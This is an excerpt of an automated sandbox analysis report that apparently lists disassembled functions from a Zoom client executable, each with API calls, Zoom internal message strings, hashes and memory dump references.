                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.mapi.outlook.on.get.mapi.calendar.events.notify$outJsonEvents
                • API String ID: 3166440930-3677924241
                • Opcode ID: 9904add54b2faad13db9b8616c4596b9196c698efbcca062342b9c1e9653a599
                • Instruction ID: a0c22731927d5f55345c5668909ef62e4da174566bea73e2a1e5f1e321368b91
                • Opcode Fuzzy Hash: 9904add54b2faad13db9b8616c4596b9196c698efbcca062342b9c1e9653a599
                • Instruction Fuzzy Hash: BDE092B0A0139167CB34AB108C45B2EA6B4AB90757F000618B6015A392CBF84984DB76
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70907
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.log.subchannel_remove,00009DA3,ChannelId,00000004), ref: 00C70922
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ChannelId$com.zoom.app.log.subchannel_remove
                • API String ID: 4281283084-3665214052
                • Opcode ID: 6f70fd332cfa5af1a7b3494b53aa804f7bef546d2a81ec83edceac8a6dae61b5
                • Instruction ID: a7f3a106ce842624b582951c60efc6196f06627e56f682d96b46be38a064cb6a
                • Opcode Fuzzy Hash: 6f70fd332cfa5af1a7b3494b53aa804f7bef546d2a81ec83edceac8a6dae61b5
                • Instruction Fuzzy Hash: B4E06FB0A40380E7C7217B008C89B9EA2A4AB80B1AF504928F2004B3C3CBF48840DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E917
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.get.service.status.response,00009DD5,status,00000004), ref: 00C6E932
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.get.service.status.response$status
                • API String ID: 4281283084-1970149147
                • Opcode ID: 3e833d5a32e04e3167e3c5145c347c6e48253101ff121e16ea6df0fef4b60614
                • Instruction ID: dd162463116944af6a58060e180872399734636abb44fe0b87d8d60917ac3d8e
                • Opcode Fuzzy Hash: 3e833d5a32e04e3167e3c5145c347c6e48253101ff121e16ea6df0fef4b60614
                • Instruction Fuzzy Hash: BFE0D8B0A4035197C7217B159C49F5E66E49F40716F544469B5015B3C2CBF44841DF78
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76AC7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.ps.query.component.exist,0001388A,componentType,00000004), ref: 00C76AE2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.ps.query.component.exist$componentType
                • API String ID: 4281283084-621653104
                • Opcode ID: b0af552c073a34a6ac72f3c573800e414fd739f4d71bb80b084f85eb4931a188
                • Instruction ID: 907844831efb3071c9564665a7688496b4836bfc6d2b9246eba9848fb2e74b6b
                • Opcode Fuzzy Hash: b0af552c073a34a6ac72f3c573800e414fd739f4d71bb80b084f85eb4931a188
                • Instruction Fuzzy Hash: 53E0D8F1A4079067C7227B148C4975E66A4AB50B17F90066CF1455A3C2CBF84941EB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74AF7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.subscribe.presence.expire,00002782,UserList,00000004), ref: 00C74B12
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserList$com.Zoom.app.conf.subscribe.presence.expire
                • API String ID: 3166440930-3374428609
                • Opcode ID: 39d84e5fac6e69879e363c5ba51768d3cbeafa49c05fc0286ddeb5b3968ca6e1
                • Instruction ID: 88048c47ea59ab6cd44429542bf47ad077b71640cbe9bbb91cc62d93028946d5
                • Opcode Fuzzy Hash: 39d84e5fac6e69879e363c5ba51768d3cbeafa49c05fc0286ddeb5b3968ca6e1
                • Instruction Fuzzy Hash: 2EE06FF0A007C0A7D7307B018C48B1E26B8EB40B0AF80863CB6095B382CBF48D80EB71
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74A97
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.get.presence.response,00002781,UserList,00000004), ref: 00C74AB2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserList$com.Zoom.app.conf.get.presence.response
                • API String ID: 3166440930-3636466401
                • Opcode ID: 0e2ecff73d9e5c3159e00f849840337c17b31b0f8e3721ab6995db993fa41c2d
                • Instruction ID: 19ba3ffe48d5172896e5124afe9add5334e636b861f4f44441b6ff40b4ca6794
                • Opcode Fuzzy Hash: 0e2ecff73d9e5c3159e00f849840337c17b31b0f8e3721ab6995db993fa41c2d
                • Instruction Fuzzy Hash: 99E0D8B4A007807BD7207B158C89B1F66B4DB80715F504528B5255B3D2CBF44984EB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72A57
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.useaudio.request,00009E90,bUse,00000004), ref: 00C72A72
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: bUse$com.zoom.app.cci.ccivideo.useaudio.request
                • API String ID: 4281283084-3954845615
                • Opcode ID: 252699219401d5ce0cf2a6e7e0e645b55a3cd5f97f38584d6f141859e4c3917f
                • Instruction ID: f46e30ca2c4087aab0ce167569d5e6d771cfcbd1182e1598a9fa7e8747041621
                • Opcode Fuzzy Hash: 252699219401d5ce0cf2a6e7e0e645b55a3cd5f97f38584d6f141859e4c3917f
                • Instruction Fuzzy Hash: AAE0D8B194078067D720BF14CC4672E26F4A750B1AFE44469B10C5F392CBF54881E7B8
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CA17
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.report.issue,0000275A,jsonValue,00000004), ref: 00C6CA32
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.pt.report.issue$jsonValue
                • API String ID: 3166440930-624225280
                • Opcode ID: 69c35dcbf5f5025c4d2d77bd997575a68f66f4de7e7f46a3e5ad6c337e12b09f
                • Instruction ID: 0b94650302a820aa75488442b195ae8f9431aeb4ef14d5c21156d6e0f822a9bf
                • Opcode Fuzzy Hash: 69c35dcbf5f5025c4d2d77bd997575a68f66f4de7e7f46a3e5ad6c337e12b09f
                • Instruction Fuzzy Hash: EEE0D8B0A00390A7D7307B158C85B1E66B4AB51F16F44452CB2015B392CBF54844DBB9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CB97
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.audio.configure.response,00009C60,Result,00000004), ref: 00C6CBB2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
